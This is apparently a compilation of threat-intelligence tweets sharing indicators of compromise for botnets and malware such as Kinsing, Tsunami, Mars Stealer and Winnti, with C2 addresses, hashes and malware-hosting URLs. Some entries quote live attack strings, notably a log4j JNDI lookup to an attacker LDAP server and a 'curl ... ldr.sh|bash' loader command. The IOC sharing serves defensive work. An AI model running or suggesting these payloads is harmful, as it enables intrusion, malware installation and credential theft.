IoT Botnet Exploiting #CVE-2021-44228 #log4j User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat} The payload is JavaScript code executed in Java using ScriptEngineManager. IOCs and sample: https://t.co/kvKqdFIaDD

#microsoft just released a article related to #NorthKorean #ThreatActors https://t.co/OL5yZTwBD4 Seems to be that this is a active IOC's related to the ransomware group: 192.177.51.248 ccwaterfall[.]com cc: @tolisec @500mk500 @Gi7w0rm @UK_Daniel_Card @tosscoinwitcher

We are proud to have assisted (along with partners) in the US DoJ & FBI-led disruption of the Moobot malware botnet comprised of SOHO routers utilized by APT 28/Fancy Bear: https://t.co/RnswWqlgYo Data on infections shared in Sinkhole HTTP Events report:

📢 In #FIRSTCTI22, @unixfreaxjp w/ LACERT teams will share the implementation of @FIRSTdotOrg #CTI Curriculum methods into their investigation of targeted #WebSkimming threat as takeaways for #BlueTeam https://t.co/x3RuGQGtlI Register soon, we value your time with good sharing!

Follina patch CVE-2022-30190. (msdt.exe) is out. https://t.co/bWTfNHiBxW

Están llegando los mineros! 🤖 (CVE-2022-1388) IP atacante: 85.106.114.175 🇹🇷 Payload: curl 202.28.229.174/ldr.sh|bash Muestras: https://t.co/LWi6xDlHrO * Incluye exfiltración de credenciales SSH

Everybody is familiar with the value of a tool like VirusTotal for malware... Ever wanted a similar tool for analyzing _not_ malware? Check out @echotrailco - solid collection of information & stats about common binaries found on healthy systems. https://t.co/1owpa5ZqrP

𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia Threat Actor keep changing urls C2 Domain : http://jsdkca(.)link/518855.php hash: 6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9 Seems malware infection in maas in this C2

VirusTotal welcomes @elfdigest to the VT multi-sandbox project! https://t.co/iqHDobEGLB by @karlhiramoto

Currently 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia They are targeting again India, Brazil, Indonesia,Egypt,Vietnam,Pakistan, Philippines,Mexico C2: hxxp://jsdkct(.)link/47747.php Hash: 95b229600f28adfbe56fc09cd8a8ff88baf261329999f681613e5c951907d451

Recently deployed #Mars #Stealer #Malware C2: http://62.204.41.180/5xtELSMXvf.php Hash: 4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15 e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc

Will you be interested to join our #shellcode ADVANCED workshop w/#radare2 to study & RE on how recent threats are using shellcode in their actions aim Win/Mac/Linux OS? This vote will decide workshop planning, your answers matter! cc: @cedoxX @trufae @radareorg #MalwareMustDie

Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here : http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: @500mk500 (;

@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb Another server used in the same campaign: 80.92.204.82 🇩🇪

@1ZRR4H @ankit_anubhav @malwrhunterteam @0xrb The malware hosting server has moved to: 195.2.81.27 🇷🇺

Active #Kinsing #cryptomining campaign targeting exposed Docker API IoCs: hxxp://185.231.153.4/d.sh 🇷🇺 scanner/loader: 95.182.120.39 🇷🇺 initial payload: https://t.co/PRQUpGfuEC kinsing bin: https://t.co/SXRoRPf8OO

an update of the same botnet, another shellscript payload: hxxp://oracle.zzhreceive.top/b2f628fff19fda999999999/dktest.sh bazaar:

Cryptomining #Linux #botnet exploiting exposed Docker APIs: - shell-script as initial payload - uses Diamorphine and LD_PRELOAD rootkits - drops Tsunami bin with .jpg extension - looks for SSH keys and AWS creds (Team-TNT code reuse) IoCs and analysis: https://t.co/SltARQAsYE

Another large size net associated with #SystemBC Malware c2 (31.44.185(.)11) From Russia ( WebLine LTD ) more than 16000 victim infected cc: @Cryptolaemus1 @1ZRR4H @bofheaded

#Kinsing botnet exploiting #log4j IoCs: ldap/web: 178[.]20[.]40[.]227 kinsing bin: https://t.co/XbX3ZoXpv6 curl-amd64: 6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3 libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

Tsunami botnet update #log4j IoC: ldap 135.148.132.224:1389 hxxp://106.246.224.219/.l/pty3 hxxp://106.246.224.219/.l/pty4 MalwareBazaar : https://t.co/VIUOOBhfQg